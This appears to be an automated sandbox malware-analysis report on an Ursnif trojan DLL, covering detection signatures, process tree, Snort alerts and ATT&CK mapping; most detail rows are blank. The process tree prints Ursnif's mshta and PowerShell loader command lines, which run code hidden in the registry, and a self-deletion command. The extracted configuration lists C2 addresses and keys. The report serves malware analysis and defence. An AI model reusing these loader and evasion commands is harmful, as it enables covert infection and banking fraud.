Edit tour
Windows
Analysis Report
VoevdOQpeU.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 1428 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\Voe vdOQpeU.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 1796 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\Voe vdOQpeU.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 5292 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\Voev dOQpeU.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6956 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - rundll32.exe (PID: 7132 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A) - WerFault.exe (PID: 3084 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 5640 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 4144 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6532 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Xf38='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Xf38).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6612 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name uqcy wglb -valu e gp; new- alias -nam e kiubrmsy n -value i ex; kiubrm syn ([Syst em.Text.En coding]::A SCII.GetSt ring((uqcy wglb "HKCU :Software\ AppDataLow \Software\ Microsoft\ 54E80703-A 337-A6B8-C DC8-873A51 7CAB0E").U rlsReturn) ) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6788 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\poet0yx q\poet0yxq .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6804 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES2392.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\poe t0yxq\CSCB 57F5835494 94C91A9647 985948976. TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 6844 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\bscdh0f 0\bscdh0f0 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6920 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES3B60.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\bsc dh0f0\CSCC EA1AC591E3 E41DFA7DCA 22F6F20A95 .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3616 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 4432 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\VoevdOQp eU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5388 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 15 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/23/22-08:12:19.910177 04/23/22-08:12:19.910177 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:12:21.823792 04/23/22-08:12:21.823792 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:11:59.593120 04/23/22-08:11:59.593120 |
SID: | 2033203 |
Source Port: | 49760 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:12:20.776897 04/23/22-08:12:20.776897 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: |
Source: | Process created: |
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Binary or memory string: |
Source: | Key opened: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Code function: |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: |
Source: | Window / User API: | ||
Source: | Window / User API: |
Source: | Check user administrative privileges: |
Source: | Process information queried: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Thread delayed: |
Source: | Code function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Process token adjusted: |
Source: | Process queried: | ||
Source: | Process queried: |
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: |
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Thread created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 413 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 413 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
